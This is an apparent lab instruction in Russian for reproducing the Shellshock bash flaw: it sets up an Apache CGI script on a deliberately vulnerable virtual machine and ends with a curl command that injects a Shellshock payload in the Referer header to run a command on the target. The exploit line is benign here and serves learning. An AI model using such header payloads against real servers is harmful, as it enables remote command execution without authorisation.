На уязвимой виртуалке пропиши в /usr/local/apache/conf/httpd.confScriptAlias

1. На уязвимой виртуалке пропиши в /usr/local/apache/conf/httpd.conf
2.  
3. ScriptAlias /cgi-bin/ "/usr/local/apache/cgi-bin/"
4. <Directory "usr/local/apache/cgi-bin">
5. SetHandler cgi-script
6. OPtions +ExecCGI
7. Order allow,deny
8. Allow from all
9. </Directory>
10.  
11. Создай папку /usr/local/apache/cgi-bin  если её нет.
12. Положи туда file.cgi
13. с содержанием
14. #!/bin/bash
15. echo "Content-type: text/html"
16. echo ""
17. echo "Hello"
18.  
19. дай ему права chmod 755 file.cgi
20.  
21.  
22. С другой виртуалки проверь доступен ли созданный скрипт. В браузере отрой url <ip-уязвимой-машины>/cgi-bin/file.cgi.
23.  
24. Потом попробуй проверить работает ли уязвимость или нет.
25.  
26. Например, можно попробовать файл создать
27. curl -k -H 'Referer:() { :; }; /bin/bash -c "touch 1111111.txt"' <ip-уязвимой-машины>/cgi-bin/file.cgi
28.  
29. Можно попробовать другие заголовки. Ну в статьях видел наверное